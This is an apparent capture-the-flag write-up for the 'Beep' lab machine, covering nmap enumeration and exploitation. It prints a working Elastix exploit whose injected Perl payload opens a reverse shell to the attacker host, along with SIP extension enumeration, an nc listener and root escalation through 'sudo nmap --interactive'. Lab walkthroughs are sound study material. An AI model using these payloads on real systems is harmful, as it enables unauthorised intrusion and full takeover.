Beep

OS: Linux, Difficulty: Easy, IP: 10.10.10.7

Initial Enumeration

# Nmap 7.80 scan initiated Wed Sep 25 13:54:58 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 993,80,110,10000,143,3306,4190,4559,995,111,5038,443,22,4445,880,25,U:10000 10.10.10.7
Nmap scan report for 10.10.10.7
Host is up (0.23s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp open http Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: IMPLEMENTATION(Cyrus POP3 server v2) STLS AUTH-RESP-CODE TOP USER RESP-CODES UIDL APOP PIPELINING LOGIN-DELAY(0) EXPIRE(NEVER)
111/tcp open rpcbind 2 (RPC #100000)
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: BINARY UNSELECT Completed ATOMIC LITERAL+ X-NETSCAPE LIST-SUBSCRIBED SORT=MODSEQ IDLE UIDPLUS ACL MULTIAPPEND IMAP4rev1 RIGHTS=kxte STARTTLS CATENATE THREAD=ORDEREDSUBJECT NAMESPACE NO ANNOTATEMORE THREAD=REFERENCES LISTEXT OK CHILDREN CONDSTORE QUOTA MAILBOX-REFERRALS IMAP4 URLAUTHA0001 SORT ID RENAME
443/tcp open ssl/https?
|_ssl-date: 2019-09-25T08:20:35+00:00; -7m55s from scanner time.
880/tcp open status 1 (RPC #100024)
993/tcp open ssl/imap Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp open pop3 Cyrus pop3d
3306/tcp open mysql MySQL (unauthorized)
4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp open upnotifyp?
4559/tcp open hylafax HylaFAX 4.3.10
5038/tcp open asterisk Asterisk Call Manager 1.1
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|media device|PBX|WAP|printer|specialized
Running (JUST GUESSING): Linux 2.6.X|2.4.X (95%), Linksys embedded (94%), HP embedded (94%), Enterasys embedded (94%), Netgear embedded (94%), Osmosys embedded (93%), Riverbed RiOS (93%)
OS CPE: cpe:/o:linux:linux_kernel:2.6.27 cpe:/o:linux:linux_kernel:2.6.18 cpe:/o:linux:linux_kernel:2.4.32 cpe:/h:linksys:wrv54g cpe:/h:enterasys:ap3620 cpe:/h:netgear:eva9100 cpe:/o:riverbed:rios
Aggressive OS guesses: Linux 2.6.27 (95%), Linux 2.6.9 - 2.6.24 (95%), Linux 2.6.9 - 2.6.30 (95%), Linux 2.6.27 (likely embedded) (95%), Linux 2.6.18 (95%), Linux 2.6.20-1 (Fedora Core 5) (95%), Linux 2.6.30 (95%), Linux 2.6.5 (Fedora Core 2) (95%), Linux 2.6.5 - 2.6.12 (95%), Linux 2.6.5-7.283-smp (SuSE Enterprise Server 9, x86) (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix
Host script results:
|_clock-skew: -7m55s
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 226.92 ms 10.10.14.1
2 227.25 ms 10.10.10.7
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep 25 14:01:06 2019 -- 1 IP address (1 host up) scanned in 368.60 seconds

Running all the services through the searchsploit didn't get me anything worthwhile, either the exploits failed or were not at all working due to compatibility or version issues. The obvious attack vectors left were the web-servers on port 10000 and 80 . The one at 10000 didn't have anything interesting however the one at 80, the elastix server had some publicly available exploits, namely 18650.

--- SNIP ---
import urllib
import ssl
rhost="10.10.10.7"
lhost="10.10.14.4"
lport=5555
extension="1000"
url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
urllib.urlopen(url)
--- SNIP ---

Running the script as it is didn't get me the shell as expected however did get me SSL errors, which I tried resolving using the modified script below, and along side that I had to find a valid extension number which I did using the following snippet of svwar tool.

svwar -m INVITE -e100-300 10.10.10.7
import urllib
import ssl
rhost="10.10.10.7"
lhost="10.10.14.4"
lport=5555
extension="233"
# Reverse shell payload
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
urllib.urlopen(url, context=ctx)

However this didn't seem to work either, still got SSL errors, so as I knew this was just making a request to a the web-server with some parameters, so I pasted the request in the browser and kept listening for the reverse shell and to my surprise I got the reverse shell.

$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.7] 58227
id
uid=100(asterisk) gid=101(asterisk)

User and Root Own

Beneath the exploit script itself there was a way mentioned for privilege escalation, to which I gave a shot and to my astonishment that worked out just fine and got me root shell.

sudo nmap --interactive
Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
bash
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
cat /root/root.txt
d88e0***
cat /home/fanis/user.txt
aeff3***

Learning Outcome

I learnt about SIP extensions and how to find a valid one for the machine and target, and how reading the exploit scripts in details can actually help in owning the complete machine.